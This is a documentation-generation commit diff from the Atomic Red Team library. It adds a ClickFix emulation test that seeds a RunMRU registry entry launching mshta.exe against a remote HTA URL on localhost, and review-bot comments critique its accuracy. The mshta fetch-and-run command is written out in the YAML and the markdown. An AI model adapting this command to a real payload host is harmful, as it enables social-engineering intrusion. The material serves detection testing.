Generated docs from job=generate-docs branch=master [ci skip]

Atomic Red Team doc generator
2025-07-18 13:21:31 +00:00
parent 858a035852
commit a126a1898a
10 changed files with 74 additions and 3 deletions
@@ -2,7 +2,7 @@
# Atomic Red Team
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1731-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1732-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
Atomic Red Team™ is a library of tests mapped to the
File diff suppressed because one or more lines are too long
@@ -1003,6 +1003,7 @@ execution,T1204.002,User Execution: Malicious File,8,Potentially Unwanted Applic
execution,T1204.002,User Execution: Malicious File,9,Office Generic Payload Download,5202ee05-c420-4148-bf5e-fd7f7d24850c,powershell
execution,T1204.002,User Execution: Malicious File,10,LNK Payload Download,581d7521-9c4b-420e-9695-2aec5241167f,powershell
execution,T1204.002,User Execution: Malicious File,11,Mirror Blast Emulation,24fd9719-7419-42dd-bce6-ab3463110b3c,powershell
execution,T1204.002,User Execution: Malicious File,12,ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell,3f3120f0-7e50-4be2-88ae-54c61230cb9f,powershell
execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
execution,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
@@ -698,6 +698,7 @@ execution,T1204.002,User Execution: Malicious File,8,Potentially Unwanted Applic
execution,T1204.002,User Execution: Malicious File,9,Office Generic Payload Download,5202ee05-c420-4148-bf5e-fd7f7d24850c,powershell
execution,T1204.002,User Execution: Malicious File,10,LNK Payload Download,581d7521-9c4b-420e-9695-2aec5241167f,powershell
execution,T1204.002,User Execution: Malicious File,11,Mirror Blast Emulation,24fd9719-7419-42dd-bce6-ab3463110b3c,powershell
execution,T1204.002,User Execution: Malicious File,12,ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell,3f3120f0-7e50-4be2-88ae-54c61230cb9f,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1106,Native API,2,WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique,ce4e76e6-de70-4392-9efe-b281fc2b4087,powershell
execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique,7ec5b74e-8289-4ff2-a162-b6f286a33abd,powershell
@@ -1334,6 +1334,7 @@
- Atomic Test #9: Office Generic Payload Download [windows]
- Atomic Test #10: LNK Payload Download [windows]
- Atomic Test #11: Mirror Blast Emulation [windows]
- Atomic Test #12: ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell [windows]
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
@@ -945,6 +945,7 @@
- Atomic Test #9: Office Generic Payload Download [windows]
- Atomic Test #10: LNK Payload Download [windows]
- Atomic Test #11: Mirror Blast Emulation [windows]
- Atomic Test #12: ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell [windows]
- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1106 Native API](../../T1106/T1106.md)
@@ -53543,6 +53543,21 @@ execution:
cleanup_command: reg delete "HKCU\SOFTWARE\Microsoft\Office\16.0\Excel\Security"
/v "VBAWarnings" /f
name: powershell
- name: ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell
auto_generated_guid: 3f3120f0-7e50-4be2-88ae-54c61230cb9f
description: |
Simulates a ClickFix-style campaign by adding a malicious entry to the RunMRU registry key that launches `mshta.exe` with a remote payload.
This technique relies on user interaction (Win+R + Enter) to trigger execution.
Used in social engineering campaigns that aim to bypass traditional startup methods.
Reference: https://www.netskope.com/blog/lumma-stealer-fake-captchas-new-techniques-to-evade-detection
supported_platforms:
- windows
executor:
command: Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
-Name "atomictest" -Value '"C:\Windows\System32\mshta.exe" http://localhost/hello6.hta'
cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
-Name "atomictest" -ErrorAction SilentlyContinue
name: powershell
T1053.003:
technique:
type: attack-pattern
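Review bot: the description line `adding a malicious entry to the RunMRU registry key that launches mshta.exe` overstates what the executor does. Writing a value under RunMRU does not launch anything, and the value written here is not even a well-formed Run history entry: Explorer stores RunMRU as single-letter value names (`a`, `b`, ...) whose order is kept in a string value named `MRUList`, and each datum carries a trailing `\1` (for example `a` = `cmd\1`, `MRUList` = `a`). A value named `atomictest` with no `MRUList` update will not show up in the Win+R drop-down, so the "Win+R + Enter" trigger the description promises never exists. In a real ClickFix chain the RunMRU entry is the forensic artifact Explorer writes after the victim pastes and runs the command; seeding that artifact is a reasonable way to exercise registry-based detections, but the text should say that is what the test does. Suggest rewording to something like `Seeds a ClickFix-style mshta command into the RunMRU key to emulate the artifact left when a victim runs the pasted command from Win+R`, and, if a realistic entry is wanted, writing a single-letter value with the `\1` suffix and updating `MRUList`.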
@@ -44339,6 +44339,21 @@ execution:
cleanup_command: reg delete "HKCU\SOFTWARE\Microsoft\Office\16.0\Excel\Security"
/v "VBAWarnings" /f
name: powershell
- name: ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell
auto_generated_guid: 3f3120f0-7e50-4be2-88ae-54c61230cb9f
description: |
Simulates a ClickFix-style campaign by adding a malicious entry to the RunMRU registry key that launches `mshta.exe` with a remote payload.
This technique relies on user interaction (Win+R + Enter) to trigger execution.
Used in social engineering campaigns that aim to bypass traditional startup methods.
Reference: https://www.netskope.com/blog/lumma-stealer-fake-captchas-new-techniques-to-evade-detection
supported_platforms:
- windows
executor:
command: Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
-Name "atomictest" -Value '"C:\Windows\System32\mshta.exe" http://localhost/hello6.hta'
cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
-Name "atomictest" -ErrorAction SilentlyContinue
name: powershell
T1053.003:
technique:
type: attack-pattern
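Review bot: the executor command `Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"` fails with a path-not-found error on a profile where the RunMRU key does not exist yet (Explorer creates it the first time the Run dialog is used), so the atomic errors out on a fresh test VM. Either add a `dependencies` block with a `prereq_command` that checks the key exists and a `get_prereq_command` that runs `New-Item -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Force`, or create the key inside the command before the `Set-ItemProperty`. The cleanup already uses `-ErrorAction SilentlyContinue`, so it copes either way.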
@@ -34,6 +34,8 @@ While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently
- [Atomic Test #11 - Mirror Blast Emulation](#atomic-test-11---mirror-blast-emulation)
- [Atomic Test #12 - ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell](#atomic-test-12---clickfix-campaign---abuse-runmru-to-launch-mshta-via-powershell)
<br/>
@@ -671,4 +673,39 @@ reg delete "HKCU\SOFTWARE\Microsoft\Office\16.0\Excel\Security" /v "VBAWarnings"
<br/>
<br/>
## Atomic Test #12 - ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell
Simulates a ClickFix-style campaign by adding a malicious entry to the RunMRU registry key that launches `mshta.exe` with a remote payload.
This technique relies on user interaction (Win+R + Enter) to trigger execution.
Used in social engineering campaigns that aim to bypass traditional startup methods.
Reference: https://www.netskope.com/blog/lumma-stealer-fake-captchas-new-techniques-to-evade-detection
**Supported Platforms:** Windows
**auto_generated_guid:** 3f3120f0-7e50-4be2-88ae-54c61230cb9f
#### Attack Commands: Run with `powershell`!
```powershell
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "atomictest" -Value '"C:\Windows\System32\mshta.exe" http://localhost/hello6.hta'
```
#### Cleanup Commands:
```powershell
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "atomictest" -ErrorAction SilentlyContinue
```
<br/>
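Review bot: `http://localhost/hello6.hta` in the attack command is a hard-coded URL with nothing served behind it, so the seeded Run entry can never fetch a payload, and a reader who follows the Win+R instruction in the description just gets a connection error from mshta. If the entry is only meant to be a detection artifact, the description should say so instead of `that launches mshta.exe with a remote payload`; if operators are expected to host a benign HTA, expose the URL as an input argument (for example `hta_url` with the localhost value as its default) rather than baking it into the command. This .md is generated from the technique YAML, so the fix belongs in the YAML, not here.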